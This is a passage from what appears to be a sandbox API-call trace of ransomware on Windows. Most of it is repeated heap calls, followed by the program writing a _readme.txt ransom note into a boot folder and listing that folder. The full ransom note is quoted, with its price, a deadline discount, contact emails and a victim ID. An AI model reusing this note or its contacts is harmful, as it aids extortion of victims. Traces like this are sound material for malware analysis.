Flags=0x0, Size=0x20) returned 0x31ed968 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.534] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.534] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.535] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.535] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.536] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.536] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.537] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.537] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.538] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.538] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.539] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed968 | out: hHeap=0x630000) returned 1 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.539] PathFindFileNameW (pszPath="C:\\Boot\\it-IT\\") returned="it-IT\\" [0227.539] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.539] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.539] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.539] PathFindFileNameW (pszPath="") returned="" [0227.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed9b8 [0227.540] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.540] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.540] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.540] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.540] PathAppendW (in: pszPath="C:\\Boot\\it-IT\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 1 [0227.540] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.540] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.541] PathFileExistsW (pszPath="C:\\Boot\\it-IT\\_readme.txt") returned 0 [0227.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.542] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd" [0227.542] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjd", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-KuTq0Kujnj\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0214OIQuhkjdKO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0227.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3c18 [0227.542] CreateFileW (lpFileName="C:\\Boot\\it-IT\\_readme.txt" (normalized: "c:\\boot\\it-it\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0227.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3c18 | out: hHeap=0x630000) returned 1 [0227.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b0468 | out: hHeap=0x630000) returned 1 [0227.542] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.542] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.542] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0227.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.543] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0227.543] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0227.543] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe9e80ea3, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16250, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0227.543] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0227.543] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a3390 | out: hHeap=0x630000) 